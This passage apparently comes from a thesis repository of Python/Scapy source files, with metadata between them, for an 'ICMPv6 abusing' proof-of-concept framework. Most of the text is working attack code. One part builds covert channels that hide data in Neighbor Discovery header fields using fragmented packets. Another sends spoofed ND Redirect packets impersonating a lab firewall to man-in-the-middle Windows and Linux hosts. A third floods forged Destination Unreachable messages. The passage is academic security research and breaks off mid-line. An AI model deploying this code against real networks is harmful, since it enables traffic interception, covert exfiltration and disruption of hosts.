HelperClass.fragmentPacket(ipAdr, ICMPv6ND_RA(reachabletime=chunk, routerlifetime=0))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ND_RA(reachabletime=chunk, routerlifetime=0)]\n\n def buildPacketRetransTimer(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6ND_RA(retranstimer=chunk, routerlifetime=0))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ND_RA(retranstimer=chunk, routerlifetime=0)]\n \n def execModule(self, dataCode, dataChlim, dataM, dataO, dataH, dataPrf, dataP, dataRes, dataRouterLifeTime, dataReachTime, dataRetransTimer, exitIface, ipAdr):\n if dataCode:\n data = self.nameCode+dataCode\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthCode, self.nameCode)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketCode(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataChlim:\n data = self.nameCurHopLimit+dataChlim\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthCurHopLimit, self.nameCurHopLimit)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketCurHopLimit(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataM:\n data = self.nameM+dataM\n sendingBuffer = HelperClass.chunkPacketsBit(data, self.bandwidthM, self.nameM)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketM(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataO:\n data = self.nameO+dataO\n sendingBuffer = HelperClass.chunkPacketsBit(data, self.bandwidthO, self.nameO)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketO(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataH:\n data = self.nameH+dataH\n sendingBuffer = HelperClass.chunkPacketsBit(data, self.bandwidthH, self.nameH)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketH(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataPrf:\n data = self.namePrf+dataPrf\n sendingBuffer = HelperClass.chunkPackets2Bit(data, self.bandwidthPrf, self.namePrf)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketPrf(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataP:\n data = self.nameP+dataP\n sendingBuffer = HelperClass.chunkPacketsBit(data, self.bandwidthP, self.nameP)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketP(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataRes:\n data = self.nameRes+dataRes\n sendingBuffer = HelperClass.chunkPackets2Bit(data, self.bandwidthRes, self.nameRes)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketRes(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataRouterLifeTime:\n data = self.nameRouterLifeTime+dataRouterLifeTime\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthRouterLifeTime, self.nameRouterLifeTime)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketRouterLifeTime(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataReachTime:\n data = self.nameReachTime+dataReachTime\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthReachTime, self.nameReachTime)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketReachTime(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataRetransTimer:\n data = self.nameRetransTimer+dataRetransTimer\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthRetransTimer, self.nameRetransTimer)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketRetransTimer(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n \n \nclass NeighborSolicitationCovert:\n\n def __init__(self, frag):\n self.fragmentation = frag\n self.bandwidthCode = 1\n self.bandwidthRes = 4\n self.bandwidthTargetAdr = 16\n self.nameCode = 'Neighbor Solicitation code '\n self.nameRes = 'Neighbor Solicitation reserved '\n self.nameTargetAdr = 'Neighbor Solicitation target address '\n\n def buildPacketCode(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6ND_NS(code=chunk))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ND_NS(code=chunk)]\n\n def buildPacketRes(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6ND_NS(res=chunk))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ND_NS(res=chunk)]\n\n def buildPacketTargetAdr(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6ND_NS(tgt=chunk))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ND_NS(tgt=chunk)]\n\n def execModule(self, dataCode, dataRes, dataTargetAdr, exitIface, ipAdr):\n if dataCode:\n data = self.nameCode+dataCode\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthCode, self.nameCode)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketCode(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataRes:\n data = self.nameRes+dataRes\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthRes, self.nameRes)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketRes(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataTargetAdr:\n data = self.nameTargetAdr+dataTargetAdr\n sendingBuffer = HelperClass.chunkPacketsToAddress(data, self.bandwidthTargetAdr, self.nameTargetAdr)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketTargetAdr(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False) \n\n \nclass NeighborAdvertisementCovert:\n\n def __init__(self, frag):\n self.fragmentation = frag\n self.bandwidthCode = 1\n self.bandwidthR = 1\n self.bandwidthS = 1 \n self.bandwidthO = 1\n #able to manage only multiple of 8 - reserved field is 29\n self.bandwidthRes = 3\n self.bandwidthTargetAddress = 16\n self.nameCode = 'Neighbor Advertisement code '\n self.nameR = 'Neighbor Advertisement R '\n self.nameS = 'Neighbor Advertisement S '\n self.nameO = 'Neighbor Advertisement O ' \n self.nameRes = 'Neighbor Advertisement reserved '\n self.nameTargetAddress = 'Neighbor Advertisement target address '\n\n def buildPacketCode(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6ND_NA(code=chunk))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ND_NA(code=chunk)]\n\n def buildPacketR(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6ND_NA(code=1, R=chunk))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ND_NA(code=1, R=chunk)]\n\n def buildPacketS(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6ND_NA(code=2, S=chunk))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ND_NA(code=2, S=chunk)]\n\n def buildPacketO(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6ND_NA(code=3, O=chunk))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ND_NA(code=3, O=chunk)]\n\n def buildPacketRes(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6ND_NA(res=chunk))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ND_NA(res=chunk)]\n\n def buildPacketTargetAddress(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6ND_NA(tgt=chunk))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ND_NA(tgt=chunk)]\n \n def execModule(self, dataCode, dataR, dataS, dataO, dataRes, dataTargetAddress, exitIface, ipAdr):\n if dataCode:\n data = self.nameCode+dataCode\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthCode, self.nameCode)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketCode(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataR:\n data = self.nameR+dataR\n sendingBuffer = HelperClass.chunkPacketsBit(data, self.bandwidthR, self.nameR)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketR(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataS:\n data = self.nameS+dataS\n sendingBuffer = HelperClass.chunkPacketsBit(data, self.bandwidthS, self.nameS)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketS(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataO:\n data = self.nameO+dataO\n sendingBuffer = HelperClass.chunkPacketsBit(data, self.bandwidthO, self.nameO)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketO(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataRes:\n data = self.nameRes+dataRes\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthRes, self.nameRes)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketRes(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataTargetAddress:\n data = self.nameTargetAddress+dataTargetAddress\n sendingBuffer = HelperClass.chunkPacketsToAddress(data, self.bandwidthTargetAddress, self.nameTargetAddress)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketTargetAddress(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n\n \nclass RedirectCovert:\n\n def __init__(self, frag):\n self.fragmentation = frag\n self.bandwidthCode = 1\n self.bandwidthRes = 4\n self.bandwidthTargetAdr = 16\n self.bandwidthDestAdr = 16\n self.nameCode = 'Redirect code '\n self.nameRes = 'Redirect reserved '\n self.nameTargetAdr = 'Redirect target address '\n self.nameDestAdr = 'Redirect destination address '\n\n def buildPacketCode(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6ND_Redirect(code=chunk))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ND_Redirect(code=chunk)]\n\n def buildPacketRes(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6ND_Redirect(res=chunk))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ND_Redirect(res=chunk)]\n\n def buildPacketTargetAdr(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6ND_Redirect(tgt=chunk))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ND_Redirect(tgt=chunk)]\n\n def buildPacketDestAdr(self, chunk, ipAdr):\n if self.fragmentation:\n return HelperClass.fragmentPacket(ipAdr, ICMPv6ND_Redirect(tgt=chunk))\n else:\n return [IPv6(dst=ipAdr)/ICMPv6ND_Redirect(tgt=chunk)]\n \n def execModule(self, dataCode, dataRes, dataTargetAdr, dataDestAdr, exitIface, ipAdr):\n if dataCode:\n data = self.nameCode+dataCode\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthCode, self.nameCode)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketCode(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataRes:\n data = self.nameRes+dataRes\n sendingBuffer = HelperClass.chunkPackets(data, self.bandwidthRes, self.nameRes)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketRes(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataTargetAdr:\n data = self.nameTargetAdr+dataTargetAdr\n sendingBuffer = HelperClass.chunkPacketsToAddress(data, self.bandwidthTargetAdr, self.nameTargetAdr)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketTargetAdr(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False)\n elif dataDestAdr:\n data = self.nameDestAdr+dataDestAdr\n sendingBuffer = HelperClass.chunkPacketsToAddress(data, self.bandwidthDestAdr, self.nameDestAdr)\n for chunk in sendingBuffer:\n packetContainer = self.buildPacketDestAdr(chunk, ipAdr)\n for packet in packetContainer:\n send(packet, iface=exitIface, verbose=False) \n\n \nclass HelperClass:\n\n @classmethod\n def chunkPackets(self, data, maxPacketSize, messageAndField):\n print '[*] %s' % messageAndField \n print '[*] bandwidth %d' % maxPacketSize\n sendingBuffer = []\n chunkNumber = 0\n print '[*] size of data %d' % len(data)\n chunks = [data[i:i+maxPacketSize] for i in range(0, len(data), maxPacketSize)]\n for tmpChunk in chunks:\n chunkNumber += 1\n tmpBit = BitArray()\n for c in tmpChunk:\n bit = BitArray(uint=ord(c), length=8)\n tmpBit.append(bit)\n sendingBuffer.append(int(tmpBit.bin, 2))\n print '[*] chunks %d' % chunkNumber\n return sendingBuffer\n\n @classmethod\n def chunkPacketsBit(self, data, maxPacketSize, messageAndField):\n print '[*] %s' % messageAndField\n maxP = float(format(maxPacketSize, '.2f'))/8\n print '[*] bandwidth %s' % format(maxP, '.2f')\n sendingBuffer = []\n chunkNumber = 0\n print '[*] size of data %d' % len(data)\n chunks = [data[i:i+maxPacketSize] for i in range(0, len(data), maxPacketSize)]\n for tmpChunk in chunks:\n for c in tmpChunk:\n bits = BitArray(uint=ord(c), length=8)\n for bit in bits.bin:\n chunkNumber += 1\n sendingBuffer.append(int(bit))\n print '[*] chunks %d' % chunkNumber\n return sendingBuffer\n\n @classmethod\n def chunkPackets2Bit(self, data, maxPacketSize, messageAndField):\n print '[*] %s' % messageAndField\n maxP = float(format(maxPacketSize, '.2f'))/8*2\n print '[*] bandwidth %s' % format(maxP, '.2f')\n sendingBuffer = []\n chunkNumber = 0\n print '[*] size of data %d' % len(data)\n chunks = [data[i:i+maxPacketSize] for i in range(0, len(data), maxPacketSize)]\n for tmpChunk in chunks:\n for c in tmpChunk:\n bits = BitArray(uint=ord(c), length=8)\n for bit in range(0, len(bits.bin), 2):\n chunkNumber += 1\n sendingBuffer.append(int(bits.bin[bit:(bit+2)], 2))\n print '[*] chunks %d' % chunkNumber\n return sendingBuffer\n \n @classmethod\n def chunkPacketsToAddress(self, data, maxPacketSize, messageAndField):\n print '[*] %s' % messageAndField \n print '[*] bandwidth %d' % maxPacketSize\n sendingBuffer = []\n chunkNumber = 0\n print '[*] size of data %d' % len(data)\n chunks = [data[i:i+maxPacketSize] for i in range(0, len(data), maxPacketSize)]\n for tmpChunk in chunks:\n tmpSendingBuffer = ''\n chunkNumber += 1\n for c in range(0, len(tmpChunk), 2):\n try:\n tmpBit = BitArray()\n firstElement = tmpChunk[c]\n firstInt = ord(firstElement)\n firstBit = BitArray(uint=firstInt, length=8)\n if c < (len(tmpChunk)-1):\n secondElement = tmpChunk[c+1]\n secondInt = ord(secondElement)\n secondBit = BitArray(uint=secondInt, length=8)\n tmpBit.append(firstBit + secondBit)\n else:\n tmpBit.append(firstBit)\n #print \"[*] tmpBit in hex is %s\" % str(hex(int(tmpBit.bin, 2)))\n if c < (len(tmpChunk)-2):\n tmpSendingBuffer += str(tmpBit.hex) + ':'\n elif (c/2+1) < 7:\n tmpSendingBuffer += str(tmpBit.hex) + '::1'\n elif (c/2+1) == 7:\n tmpSendingBuffer += str(tmpBit.hex) + ':1'\n else:\n tmpSendingBuffer += str(tmpBit.hex)\n except TypeError:\n print \"Error chunking %s%s \" % firstElement % secondElement\n try:\n #print \"[*] tmpSendingBuffer is %s\" % tmpSendingBuffer\n sendingBuffer.append(tmpSendingBuffer)\n except:\n print \"[*] error appending buffer\"\n print '[*] chunks %d' % chunkNumber\n return sendingBuffer\n\n @classmethod\n def fragmentPacket(self, ipAdr, message):\n packetContainer = []\n ipv6_1 = IPv6(dst=ipAdr)\n ipv6_2 = IPv6(dst=ipAdr)\n icmpv6 = message\n payload = \"xxxxxxxx\"\n frag = ipv6_1/IPv6ExtHdrFragment(nh=44)/payload\n icmp1 = ipv6_2/IPv6ExtHdrFragment(nh=58)/icmpv6\n icmp2 = ipv6_2/IPv6ExtHdrFragment(nh=58)/payload\n ## for p in range(0, 10):\n ## packetContainer.append(ipv6_1/IPv6ExtHdrFragment(offset=p,m=1,nh=44))\n ## packetContainer.append(ipv6_2/IPv6ExtHdrFragment(offset=10,m=0,nh=58)/icmpv6)\n packet = fragment6(ipv6_1/IPv6ExtHdrFragment()/IPv6ExtHdrFragment()/IPv6ExtHdrFragment()/IPv6ExtHdrFragment()/IPv6ExtHdrFragment()/IPv6ExtHdrFragment()/IPv6ExtHdrFragment()/IPv6ExtHdrFragment()/IPv6ExtHdrFragment()/IPv6ExtHdrFragment()/IPv6ExtHdrFragment(nh=58)/icmpv6, 80)\n for p in packet:\n packetContainer.append(p)\n return packetContainer\n\n @classmethod\n def receiver(self, iface, adr):\n rec = Receiver(iface, adr)\n rec.receive()\n" }, { "alpha_fraction": 0.6139564514160156, "alphanum_fraction": 0.6658130884170532, "avg_line_length": 41.79452133178711, "blob_id": "f7808eaeb9a1f4cbd5c8ce90782eee24010c1e77", "content_id": "9b51da779235269e52ceb61f52ceba541b1d8021", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3124, "license_type": "no_license", "max_line_length": 154, "num_lines": 73, "path": "/python/code/redirectAttacks.py~", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nfrom scapy.all import *\nfrom sets import Set\n\n\"\"\"\nthe class build ND redirect messages\n\"\"\"\nclass Redirect:\n \n def __init__():\n self.linux = \"2001:abcd:acad:2:a00:27ff:fe84:bb37\"\n self.linuxMac = \"08:00:27:84:bb:37\"\n self.linkLinux = \"fe80::a00:27ff:fe84:bb37\"\n self.win = \"2001:abcd:acad:2:b485:2aec:9447:fd83\"\n self.firewall = \"2001:abcd:acad:2::1\"\n self.linkFirewall = \"fe80::1\"\n self.prefix = \"2001:abcd:acad:2:\"\n self.attacking = \"2001:abcd:acad:1::2\"\n self.attackingMac = \"b8:27:eb:aa:31:e5\"\n self.externalAdr = \"2001:abcd:acad:1::15\"\n self.adrList = Set()\n print 'Redirect'\n\n def buildPacketInternal(self, ipAdr, mac, tgtLinkLocal):\n chksum = int(\"ace1\",16)\n identifier = int(\"0001\",16)\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n targetLinkLayer = ICMPv6NDOptDstLLAddr(lladdr=mac)\n redirHeader = ICMPv6NDOptRedirectedHdr(pkt=IPv6(dst=self.firewall,src=ipAdr,hlim=128)/ICMPv6EchoRequest(id=identifier,seq=1,cksum=chksum)/data)\n return IPv6(dst=ipAdr,src=self.linkFirewall)/ICMPv6ND_Redirect(tgt=tgtLinkLocal,dst=self.firewall)/targetLinkLayer/redirHeader\n\n def buildPacketRemote(self, ipAdr):\n chksum = int(\"f82a\",16)\n identifier = int(\"0001\",16)\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n targetLinkLayer = ICMPv6NDOptDstLLAddr(lladdr=self.attackingMac)\n redirHeader = ICMPv6NDOptRedirectedHdr(pkt=IPv6(dst=self.externalAdr,src=ipAdr,hlim=128)/ICMPv6EchoRequest(id=identifier,seq=1,cksum=chksum)/data)\n return IPv6(dst=ipAdr,src=self.firewall)/ICMPv6ND_Redirect(tgt=self.attacking,dst=self.externalAdr)/targetLinkLayer/redirHeader\n\n \n def execModuleInternalWin(self, exitIface):\n #this is to induce windows to disclose its temp adr\n pingWindows = IPv6(dst=self.win)/ICMPv6EchoReply()\n send(pingWindows, iface=exitIface, verbose=False)\n #the sniffer eventually grabs the win tmp adr\n self.receiver(exitIface)\n print self.adrList\n for adr in self.adrList:\n packetContainer = self.buildPacketInternal(adr, self.linuxMac, self.linkLinux)\n for t in range(1,500):\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleRemoteWin(self, exitIface):\n packetContainer = self.buildPacketRemote(self.win)\n for t in range(1,500):\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleRemoteLinux(self, exitIface):\n packetContainer = self.buildPacketRemote(self.linux)\n for t in range(1,500):\n send(packetContainer, iface=exitIface, verbose=False)\n\n def packet_callback(self, packet):\n if IPv6 in packet[0]:\n adr = packet[IPv6].dst\n print adr\n if self.prefix in adr and not adr == self.linux:\n self.adrList.add(adr) \n\n #the sniffer for the internal Mitm NA attack\n def receiver(self, iFace):\n sniff(iface=iFace, filter='ip6', prn=self.packet_callback, store=0, timeout=10)\n" }, { "alpha_fraction": 0.5673027038574219, "alphanum_fraction": 0.5740072131156921, "avg_line_length": 27.101449966430664, "blob_id": "5f162b18335ce8eaa8a5833936852e0fd1dbce40", "content_id": "eec32022f082578af19a461bb1bd74abccbbcb7f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1939, "license_type": "no_license", "max_line_length": 87, "num_lines": 69, "path": "/python/code/icmpv6.py", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport optparse\nimport sys\nimport re, uuid\nimport os\nimport readline\nfrom pprint import pprint\nfrom commands import *\nfrom modules import *\nimport logging\n\n\"\"\"\nclass responsible for framework initialization\nit shows a command prompt, has tab completion and history of commands\n\"\"\"\nclass ICMPv6:\n\n def __init__(self, iface):\n self.commandBuffer = []\n self.iface = iface\n logging.getLogger(\"scapy.runtime\").setLevel(logging.ERROR)\n\n #shows the logo of the framework\n def startupLogo(self):\n initLogo = [80*'*', '', '\\t\\t\\tICMPv6 abusing - Proof of Concept', '', 80*'*']\n for line in initLogo:\n print line\n\n #starts the interactive prompt\n def startSystem(self):\n os.system('clear')\n self.startupLogo()\n Commands.setMainHistory()\n running = 1\n while running:\n readline.parse_and_bind(\"tab: complete\")\n #we receive data from the keyboard \n command = raw_input('[]>')\n #commands\n if re.match('help', command):\n self.showHelp()\n elif re.match('quit', command):\n running = 0\n sys.exit(1)\n elif re.match(r'testing', command):\n module = TestingFramework(self.iface)\n module.startSystem()\n else:\n print 'Error! Command not found!'\n \n def showHelp(self):\n for entry in Help.getMainHelp():\n print entry\n\ndef main():\n parser = optparse.OptionParser(\"usage: %prog -i <interface>\")\n parser.add_option('-i', dest='iface', type='string', help='specify exit interface')\n (options, args) = parser.parse_args()\n iface = options.iface\n if(iface == None):\n print parser.usage\n exit(0)\n else:\n icmpv6 = ICMPv6(iface)\n icmpv6.startSystem()\n \nif __name__ == '__main__':\n\tmain()\n" }, { "alpha_fraction": 0.671600341796875, "alphanum_fraction": 0.7091813087463379, "avg_line_length": 52.345680236816406, "blob_id": "ecc61a00641237008265d313abbfb11b5fe338cd", "content_id": "bbc342b1a0dec7a254cf47793684e0b3192c7b0d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8648, "license_type": "no_license", "max_line_length": 168, "num_lines": 162, "path": "/python/code/destinationUnreach.py~", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nfrom scapy.all import *\n\n\"\"\"\nthe class build Destination Unreachable messages\n\"\"\"\nclass DestinationUnreach:\n \n def __init__(self):\n print 'Destination Unreachable'\n self.win = \"2001:abcd:acad:2:b485:2aec:9447:fd83\"\n self.linux = \"2001:abcd:acad:2:a00:27ff:fe84:bb37\"\n self.attacker = \"2001:abcd:acad:1::2\"\n self.firewall = \"2001:abcd:acad:2::1\"\n\n def buildPacketDestUnreach(self, ipAdr, code):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n return IPv6(dst=ipAdr,src=self.firewall)/ICMPv6DestUnreach(code=code)/IPv6(dst=self.firewall,src=ipAdr,hlim=128)/ICMPv6EchoRequest(id=0,seq=0)/data\n \n def execModuleDestUnreachCode0(self, exitIface, ipAdr):\n packetContainer = self.buildPacketDestUnreach(ipAdr, 0)\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleDestUnreachCode1(self, exitIface, ipAdr):\n packetContainer = self.buildPacketDestUnreach(ipAdr, 1)\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleDestUnreachCode2(self, exitIface, ipAdr):\n packetContainer = self.buildPacketDestUnreach(ipAdr, 2)\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleDestUnreachCode3(self, exitIface, ipAdr):\n packetContainer = self.buildPacketDestUnreach(ipAdr, 3)\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleDestUnreachCode4(self, exitIface, ipAdr):\n packetContainer = self.buildPacketDestUnreach(ipAdr, 4)\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleDestUnreachCode5(self, exitIface, ipAdr):\n packetContainer = self.buildPacketDestUnreach(ipAdr, 5)\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleDestUnreachCode6(self, exitIface, ipAdr):\n packetContainer = self.buildPacketDestUnreach(ipAdr, 6)\n send(packetContainer, iface=exitIface, verbose=False)\n\n \n def execAllLinux(self, exitIface):\n self.execModuleDestUnreachCode0(exitIface, self.linux)\n self.execModuleDestUnreachCode1(exitIface, self.linux)\n self.execModuleDestUnreachCode2(exitIface, self.linux)\n self.execModuleDestUnreachCode3(exitIface, self.linux)\n self.execModuleDestUnreachCode4(exitIface, self.linux)\n self.execModuleDestUnreachCode5(exitIface, self.linux)\n self.execModuleDestUnreachCode6(exitIface, self.linux)\n\n def execAllWindows(self, exitIface):\n self.execModuleDestUnreachCode0(exitIface, self.win)\n self.execModuleDestUnreachCode1(exitIface, self.win)\n self.execModuleDestUnreachCode2(exitIface, self.win)\n self.execModuleDestUnreachCode3(exitIface, self.win)\n self.execModuleDestUnreachCode4(exitIface, self.win)\n self.execModuleDestUnreachCode5(exitIface, self.win)\n self.execModuleDestUnreachCode6(exitIface, self.win)\n\n def execDestUnreachBadCodeWin(self,exitIface):\n for code in range(7,256):\n packetContainer = self.buildPacketDestUnreach(self.win, code)\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execDestUnreachBadCodeLinux(self,exitIface):\n for code in range(7,256):\n packetContainer = self.buildPacketDestUnreach(self.linux, code)\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execDestUnreachLengthLinux(self, exitIface):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n for length in range(0,256):\n packet = IPv6(dst=self.linux,src=self.firewall)/ICMPv6DestUnreach(code=0,length=length)/IPv6(dst=self.firewall,src=self.linux,hlim=64)\n send(packet, iface=exitIface, verbose=False)\n\n def execDestUnreachLengthWin(self, exitIface):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n for length in range(0,256):\n packet = IPv6(dst=self.win,src=self.firewall)/ICMPv6DestUnreach(code=0,length=length)/IPv6(dst=self.firewall,src=self.win,hlim=128)\n send(packet, iface=exitIface, verbose=False)\n\n def execDestUnreachNoRouteToDestWin(self, exitIface):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n for x in range(0,500):\n packet = IPv6(dst=self.win,src=self.attacker)/ICMPv6DestUnreach(code=0)/IPv6(dst=self.attacker,src=self.win,hlim=128)/ICMPv6EchoRequest(id=0,seq=1)/data\n send(packet, iface=exitIface, verbose=False)\n\n def execDestUnreachNoRouteToDestLinux(self, exitIface):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n for x in range(0,500):\n packet = IPv6(dst=self.linux,src=self.attacker)/ICMPv6DestUnreach(code=0)/IPv6(dst=self.attacker,src=self.linux,hlim=64)/ICMPv6EchoRequest(id=0,seq=1)/data\n send(packet, iface=exitIface, verbose=False)\n\n def execDestUnreachAdrUnreachWin(self, exitIface):\n for x in range(0,500):\n packet = IPv6(dst=self.win,src=self.attacker)/ICMPv6DestUnreach(code=3)/IPv6(dst=self.attacker,src=self.win,hlim=128)/TCP(dport=80,flags=\"S\")\n send(packet, iface=exitIface, verbose=False)\n\n def execDestUnreachAdrUnreachLinux(self, exitIface):\n for x in range(0,500):\n packet = IPv6(dst=self.linux,src=self.attacker)/ICMPv6DestUnreach(code=3)/IPv6(dst=self.attacker,src=self.linux,hlim=64)/TCP(dport=80,flags=\"S\")\n send(packet, iface=exitIface, verbose=False)\n\n def execDestUnreachPortUnreachWin(self, exitIface):\n for x in range(0,500):\n packet = IPv6(dst=self.win,src=self.attacker)/ICMPv6DestUnreach(code=4)/IPv6(dst=self.attacker,src=self.win,hlim=128)/TCP(dport=80,flags=\"S\")\n send(packet, iface=exitIface, verbose=False)\n\n def execDestUnreachPortUnreachLinux(self, exitIface):\n for x in range(0,500):\n packet = IPv6(dst=self.linux,src=self.attacker)/ICMPv6DestUnreach(code=4)/IPv6(dst=self.attacker,src=self.linux,hlim=64)/TCP(dport=80,flags=\"S\")\n send(packet, iface=exitIface, verbose=False)\n\n def execDestUnreachCommDstAdminProhibitedWin(self, exitIface):\n for x in range(0,500):\n packet = IPv6(dst=self.win,src=self.firewall)/ICMPv6DestUnreach(code=1)/IPv6(dst=self.attacker,src=self.win,hlim=128)/TCP(dport=80,sport=49255,flags=\"S\")\n send(packet, iface=exitIface, verbose=False)\n\n def execDestUnreachCommDstAdminProhibitedLinux(self, exitIface):\n for x in range(0,500):\n packet = IPv6(dst=self.linux,src=self.firewall)/ICMPv6DestUnreach(code=1)/IPv6(dst=self.attacker,src=self.linux,hlim=64)/TCP(dport=80,sport=49255,flags=\"S\")\n send(packet, iface=exitIface, verbose=False)\n\n def execDestUnreachBeyondScopeSrcAdrWin(self, exitIface):\n for x in 